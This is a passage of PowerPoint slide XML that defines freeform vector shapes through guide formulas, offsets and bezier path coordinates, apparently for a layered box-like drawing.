                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="5603" y="2910"/>
                  <a:ext cx="175" cy="4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1" name="Freeform 14822"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5558" y="3046"/>
                  <a:ext cx="33" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 170"/>
                    <a:gd name="T1" fmla="*/ 246 h 288"/>
                    <a:gd name="T2" fmla="*/ 170 w 170"/>
                    <a:gd name="T3" fmla="*/ 288 h 288"/>
                    <a:gd name="T4" fmla="*/ 170 w 170"/>
                    <a:gd name="T5" fmla="*/ 24 h 288"/>
                    <a:gd name="T6" fmla="*/ 0 w 170"/>
                    <a:gd name="T7" fmla="*/ 0 h 288"/>
                    <a:gd name="T8" fmla="*/ 0 w 170"/>
                    <a:gd name="T9" fmla="*/ 246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0"/>
                    <a:gd name="T16" fmla="*/ 0 h 288"/>
                    <a:gd name="T17" fmla="*/ 170 w 170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0" h="288">
                      <a:moveTo>
                        <a:pt x="0" y="246"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="170" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="170" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24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2" name="Freeform 14823"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5456" y="3046"/>
                  <a:ext cx="102" cy="114"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 73 w 524"/>
                    <a:gd name="T1" fmla="*/ 586 h 586"/>
                    <a:gd name="T2" fmla="*/ 524 w 524"/>
                    <a:gd name="T3" fmla="*/ 466 h 586"/>
                    <a:gd name="T4" fmla="*/ 524 w 524"/>
                    <a:gd name="T5" fmla="*/ 0 h 586"/>
                    <a:gd name="T6" fmla="*/ 0 w 524"/>
                    <a:gd name="T7" fmla="*/ 206 h 586"/>
                    <a:gd name="T8" fmla="*/ 73 w 524"/>
                    <a:gd name="T9" fmla="*/ 586 h 58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24"/>
                    <a:gd name="T16" fmla="*/ 0 h 586"/>
                    <a:gd name="T17" fmla="*/ 524 w 524"/>
                    <a:gd name="T18" fmla="*/ 586 h 58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24" h="586">
                      <a:moveTo>
                        <a:pt x="73" y="586"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="524" y="466"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="524" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="58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3" name="Freeform 14824"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5661" y="3095"/>
                  <a:ext cx="95" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 207"/>
                    <a:gd name="T1" fmla="*/ 0 h 160"/>
                    <a:gd name="T2" fmla="*/ 0 w 207"/>
                    <a:gd name="T3" fmla="*/ 51 h 160"/>
                    <a:gd name="T4" fmla="*/ 8 w 207"/>
                    <a:gd name="T5" fmla="*/ 160 h 160"/>
                    <a:gd name="T6" fmla="*/ 198 w 207"/>
                    <a:gd name="T7" fmla="*/ 109 h 160"/>
                    <a:gd name="T8" fmla="*/ 190 w 207"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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07"/>
                    <a:gd name="T16" fmla="*/ 0 h 160"/>
                    <a:gd name="T17" fmla="*/ 207 w 207"/>
                    <a:gd name="T18" fmla="*/ 160 h 16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07" h="160">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="78"/>
                        <a:pt x="195" y="5"/>
                        <a:pt x="19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4" name="Freeform 14825"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5608" y="3049"/>
                  <a:ext cx="140" cy="69"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 305"/>
                    <a:gd name="T1" fmla="*/ 0 h 150"/>
                    <a:gd name="T2" fmla="*/ 0 w 305"/>
                    <a:gd name="T3" fmla="*/ 51 h 150"/>
                    <a:gd name="T4" fmla="*/ 115 w 305"/>
                    <a:gd name="T5" fmla="*/ 150 h 150"/>
                    <a:gd name="T6" fmla="*/ 305 w 305"/>
                    <a:gd name="T7" fmla="*/ 99 h 150"/>
                    <a:gd name="T8" fmla="*/ 190 w 305"/>
                    <a:gd name="T9" fmla="*/ 0 h 1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5"/>
                    <a:gd name="T16" fmla="*/ 0 h 150"/>
                    <a:gd name="T17" fmla="*/ 305 w 305"/>
                    <a:gd name="T18" fmla="*/ 150 h 1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5" h="150">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="150"/>
                        <a:pt x="115" y="150"/>
                        <a:pt x="115" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="99"/>
                        <a:pt x="305" y="99"/>
                        <a:pt x="305" y="99"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="296" y="90"/>
                        <a:pt x="208" y="6"/>
                        <a:pt x="19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5" name="Freeform 14826"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5511" y="3025"/>
                  <a:ext cx="184" cy="47"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 401"/>
                    <a:gd name="T1" fmla="*/ 0 h 104"/>
                    <a:gd name="T2" fmla="*/ 0 w 401"/>
                    <a:gd name="T3" fmla="*/ 51 h 104"/>
                    <a:gd name="T4" fmla="*/ 211 w 401"/>
                    <a:gd name="T5" fmla="*/ 104 h 104"/>
                    <a:gd name="T6" fmla="*/ 401 w 401"/>
                    <a:gd name="T7" fmla="*/ 53 h 104"/>
                    <a:gd name="T8" fmla="*/ 190 w 401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01"/>
                    <a:gd name="T16" fmla="*/ 0 h 104"/>
                    <a:gd name="T17" fmla="*/ 401 w 401"/>
                    <a:gd name="T18" fmla="*/ 104 h 1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01" h="104">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="0"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="104"/>
                        <a:pt x="211" y="104"/>
                        <a:pt x="211" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="401" y="53"/>
                        <a:pt x="401" y="53"/>
                        <a:pt x="401" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="383" y="46"/>
                        <a:pt x="213" y="0"/>
                        <a:pt x="19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6" name="Freeform 14827"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5578" y="2944"/>
                  <a:ext cx="174" cy="47"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 896"/>
                    <a:gd name="T1" fmla="*/ 0 h 239"/>
                    <a:gd name="T2" fmla="*/ 896 w 896"/>
                    <a:gd name="T3" fmla="*/ 239 h 239"/>
                    <a:gd name="T4" fmla="*/ 0 w 896"/>
                    <a:gd name="T5" fmla="*/ 0 h 239"/>
                    <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T9" fmla="*/ 0 w 896"/>
                    <a:gd name="T10" fmla="*/ 0 h 239"/>
                    <a:gd name="T11" fmla="*/ 896 w 896"/>
                    <a:gd name="T12" fmla="*/ 239 h 23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6" h="239">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="896" y="23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7" name="Line 14828"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5578" y="2944"/>
                  <a:ext cx="174" cy="4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8" name="Freeform 14829"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5651" y="3074"/>
                  <a:ext cx="364" cy="138"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 793"/>
                    <a:gd name="T1" fmla="*/ 291 h 300"/>
                    <a:gd name="T2" fmla="*/ 86 w 793"/>
                    <a:gd name="T3" fmla="*/ 285 h 300"/>
                    <a:gd name="T4" fmla="*/ 744 w 793"/>
                    <a:gd name="T5" fmla="*/ 108 h 300"/>
                    <a:gd name="T6" fmla="*/ 791 w 793"/>
                    <a:gd name="T7" fmla="*/ 95 h 300"/>
                    <a:gd name="T8" fmla="*/ 791 w 793"/>
                    <a:gd name="T9" fmla="*/ 0 h 300"/>
                    <a:gd name="T10" fmla="*/ 30 w 793"/>
                    <a:gd name="T11" fmla="*/ 204 h 300"/>
                    <a:gd name="T12" fmla="*/ 0 w 793"/>
                    <a:gd name="T13" fmla="*/ 291 h 30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93"/>
                    <a:gd name="T22" fmla="*/ 0 h 300"/>
                    <a:gd name="T23" fmla="*/ 793 w 793"/>
                    <a:gd name="T24" fmla="*/ 300 h 30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93" h="300">
                      <a:moveTo>
                        <a:pt x="0" y="291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="300"/>
                        <a:pt x="65" y="290"/>
                        <a:pt x="86" y="285"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="279"/>
                        <a:pt x="718" y="115"/>
                        <a:pt x="744" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="765" y="102"/>
                        <a:pt x="791" y="95"/>
                        <a:pt x="791" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="793" y="82"/>
                        <a:pt x="791" y="7"/>
                        <a:pt x="791" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="204"/>
                        <a:pt x="30" y="204"/>
                        <a:pt x="30" y="204"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="29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9" name="Freeform 14830"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5629" y="3159"/>
                  <a:ext cx="35" cy="49"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 78"/>
                    <a:gd name="T1" fmla="*/ 0 h 107"/>
                    <a:gd name="T2" fmla="*/ 0 w 78"/>
                    <a:gd name="T3" fmla="*/ 95 h 107"/>
                    <a:gd name="T4" fmla="*/ 48 w 78"/>
                    <a:gd name="T5" fmla="*/ 107 h 107"/>
                    <a:gd name="T6" fmla="*/ 78 w 78"/>
                    <a:gd name="T7" fmla="*/ 20 h 107"/>
                    <a:gd name="T8" fmla="*/ 0 w 78"/>
                    <a:gd name="T9" fmla="*/ 0 h 10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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 107"/>
                    <a:gd name="T17" fmla="*/ 78 w 78"/>
                    <a:gd name="T18" fmla="*/ 107 h 10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8" h="107">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="95"/>
                        <a:pt x="0" y="95"/>
                        <a:pt x="0" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="107"/>
                        <a:pt x="48" y="107"/>
                        <a:pt x="48" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="94"/>
                        <a:pt x="73" y="37"/>
                        <a:pt x="78" y="2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0" name="Freeform 14831"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5537" y="2735"/>
                  <a:ext cx="263" cy="193"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1353"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1353"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1353"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1353 w 1353"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1353 w 1353"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1353"/>
                    <a:gd name="T11" fmla="*/ 799 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1353"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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53"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1353 w 1353"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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53" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1353" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1353" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99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1" name="Freeform 14832"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5669" y="2771"/>
                  <a:ext cx="0" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 624 h 624"/>
                    <a:gd name="T1" fmla="*/ 0 h 624"/>
                    <a:gd name="T2" fmla="*/ 624 h 624"/>
                    <a:gd name="T3" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T6" fmla="*/ 0 h 624"/>
                    <a:gd name="T7" fmla="*/ 624 h 624"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T3">
                      <a:pos x="0" y="T0"/>
                    </a:cxn>
                    <a:cxn ang="T4">
                      <a:pos x="0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T5">
                      <a:pos x="0" y="T2"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="T6" r="0" b="T7"/>
                  <a:pathLst>
                    <a:path h="624">
                      <a:moveTo>
                        <a:pt x="0" y="624"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62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2" name="Freeform 14833"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5537" y="2806"/>
                  <a:ext cx="0" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 h 624"/>
                    <a:gd name="T1" fmla="*/ 624 h 624"/>
                    <a:gd name="T2" fmla="*/ 0 h 624"/>
                    <a:gd name="T3" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T6" fmla="*/ 0 h 624"/>
                    <a:gd name="T7" fmla="*/ 624 h 624"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T3">
                      <a:pos x="0" y="T0"/>
                    </a:cxn>
                    <a:cxn ang="T4">
                      <a:pos x="0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T5">
                      <a:pos x="0" y="T2"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="T6" r="0" b="T7"/>
                  <a:pathLst>
                    <a:path h="624">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="62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3" name="Freeform 14834"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5800" y="2735"/>
                  <a:ext cx="0" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 624 h 624"/>
                    <a:gd name="T1" fmla="*/ 0 h 624"/>
                    <a:gd name="T2" fmla="*/ 624 h 624"/>
                    <a:gd name="T3" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T6" fmla="*/ 0 h 624"/>
                    <a:gd name="T7" fmla="*/ 624 h 624"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T3">
                      <a:pos x="0" y="T0"/>
                    </a:cxn>
                    <a:cxn ang="T4">
                      <a:pos x="0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T5">
                      <a:pos x="0" y="T2"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="T6" r="0" b="T7"/>
                  <a:pathLst>
                    <a:path h="624">
                      <a:moveTo>
                        <a:pt x="0" y="624"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62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4" name="Freeform 14835"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5363" y="2669"/>
                  <a:ext cx="424" cy="104"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 923 w 923"/>
                    <a:gd name="T1" fmla="*/ 104 h 227"/>
                    <a:gd name="T2" fmla="*/ 544 w 923"/>
                    <a:gd name="T3" fmla="*/ 2 h 227"/>
                    <a:gd name="T4" fmla="*/ 544 w 923"/>
                    <a:gd name="T5" fmla="*/ 2 h 227"/>
                    <a:gd name="T6" fmla="*/ 543 w 923"/>
                    <a:gd name="T7" fmla="*/ 2 h 227"/>
                    <a:gd name="T8" fmla="*/ 543 w 923"/>
                    <a:gd name="T9" fmla="*/ 2 h 227"/>
                    <a:gd name="T10" fmla="*/ 517 w 923"/>
                    <a:gd name="T11" fmla="*/ 3 h 227"/>
                    <a:gd name="T12" fmla="*/ 56 w 923"/>
                    <a:gd name="T13" fmla="*/ 124 h 227"/>
                    <a:gd name="T14" fmla="*/ 56 w 923"/>
                    <a:gd name="T15" fmla="*/ 124 h 227"/>
                    <a:gd name="T16" fmla="*/ 0 w 923"/>
                    <a:gd name="T17" fmla="*/ 198 h 227"/>
                    <a:gd name="T18" fmla="*/ 165 w 923"/>
                    <a:gd name="T19" fmla="*/ 153 h 227"/>
                    <a:gd name="T20" fmla="*/ 439 w 923"/>
                    <a:gd name="T21" fmla="*/ 227 h 227"/>
                    <a:gd name="T22" fmla="*/ 923 w 923"/>
                    <a:gd name="T23" fmla="*/ 104 h 227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923"/>
                    <a:gd name="T37" fmla="*/ 0 h 227"/>
                    <a:gd name="T38" fmla="*/ 923 w 923"/>
                    <a:gd name="T39" fmla="*/ 227 h 227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923" h="227">
                      <a:moveTo>
                        <a:pt x="923" y="104"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="543" y="2"/>
                        <a:pt x="543" y="2"/>
                        <a:pt x="543" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="543" y="2"/>
                        <a:pt x="543" y="2"/>
                        <a:pt x="543" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="536" y="0"/>
                        <a:pt x="526" y="0"/>
                        <a:pt x="517" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="3"/>
                        <a:pt x="58" y="123"/>
                        <a:pt x="56" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="124"/>
                        <a:pt x="56" y="124"/>
                        <a:pt x="56" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="133"/>
                        <a:pt x="0" y="166"/>
                        <a:pt x="0" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="153"/>
                        <a:pt x="165" y="153"/>
                        <a:pt x="165" y="153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="439" y="227"/>
                        <a:pt x="439" y="227"/>
                        <a:pt x="439" y="227"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="923" y="10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5" name="Freeform 14836"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5363" y="2726"/>
                  <a:ext cx="202" cy="80"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 56 w 439"/>
                    <a:gd name="T1" fmla="*/ 0 h 175"/>
                    <a:gd name="T2" fmla="*/ 56 w 439"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 0 w 439"/>
                    <a:gd name="T5" fmla="*/ 74 h 175"/>
                    <a:gd name="T6" fmla="*/ 379 w 439"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 439 w 439"/>
                    <a:gd name="T9" fmla="*/ 103 h 175"/>
                    <a:gd name="T10" fmla="*/ 56 w 439"/>
                    <a:gd name="T11" fmla="*/ 0 h 17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39"/>
                    <a:gd name="T19" fmla="*/ 0 h 175"/>
                    <a:gd name="T20" fmla="*/ 439 w 439"/>
                    <a:gd name="T21" fmla="*/ 175 h 17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39" h="175">
                      <a:moveTo>
                        <a:pt x="56" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="9"/>
                        <a:pt x="0" y="42"/>
                        <a:pt x="0" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="175"/>
                        <a:pt x="379" y="175"/>
                        <a:pt x="379" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="439" y="103"/>
                        <a:pt x="439" y="103"/>
                        <a:pt x="439" y="103"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="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6" name="Freeform 14837"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5774" y="2712"/>
                  <a:ext cx="27" cy="42"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 59"/>
                    <a:gd name="T1" fmla="*/ 50 h 90"/>
                    <a:gd name="T2" fmla="*/ 1 w 59"/>
                    <a:gd name="T3" fmla="*/ 9 h 90"/>
                    <a:gd name="T4" fmla="*/ 34 w 59"/>
                    <a:gd name="T5" fmla="*/ 57 h 90"/>
                    <a:gd name="T6" fmla="*/ 58 w 59"/>
                    <a:gd name="T7" fmla="*/ 90 h 90"/>
                    <a:gd name="T8" fmla="*/ 57 w 59"/>
                    <a:gd name="T9" fmla="*/ 5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9"/>
                    <a:gd name="T16" fmla="*/ 0 h 90"/>
                    <a:gd name="T17" fmla="*/ 59 w 59"/>
                    <a:gd name="T18" fmla="*/ 90 h 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9" h="90">
                      <a:moveTo>
                        <a:pt x="57" y="50"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="19"/>
                        <a:pt x="32" y="0"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9"/>
                        <a:pt x="18" y="34"/>
                        <a:pt x="34" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="74"/>
                        <a:pt x="58" y="90"/>
                        <a:pt x="58" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="77"/>
                        <a:pt x="58" y="62"/>
                        <a:pt x="57" y="5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7" name="Freeform 14838"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5563" y="2717"/>
                  <a:ext cx="238" cy="92"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 460 w 517"/>
                    <a:gd name="T1" fmla="*/ 1 h 202"/>
                    <a:gd name="T2" fmla="*/ 460 w 517"/>
                    <a:gd name="T3" fmla="*/ 0 h 202"/>
                    <a:gd name="T4" fmla="*/ 0 w 517"/>
                    <a:gd name="T5" fmla="*/ 122 h 202"/>
                    <a:gd name="T6" fmla="*/ 56 w 517"/>
                    <a:gd name="T7" fmla="*/ 202 h 202"/>
                    <a:gd name="T8" fmla="*/ 517 w 517"/>
                    <a:gd name="T9" fmla="*/ 81 h 202"/>
                    <a:gd name="T10" fmla="*/ 460 w 517"/>
                    <a:gd name="T11" fmla="*/ 1 h 20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17"/>
                    <a:gd name="T19" fmla="*/ 0 h 202"/>
                    <a:gd name="T20" fmla="*/ 517 w 517"/>
                    <a:gd name="T21" fmla="*/ 202 h 20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17" h="202">
                      <a:moveTo>
                        <a:pt x="460" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="460" y="0"/>
                        <a:pt x="460" y="0"/>
                        <a:pt x="460" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="122"/>
                        <a:pt x="0" y="122"/>
                        <a:pt x="0" y="122"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="202"/>
                        <a:pt x="56" y="202"/>
                        <a:pt x="56" y="202"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
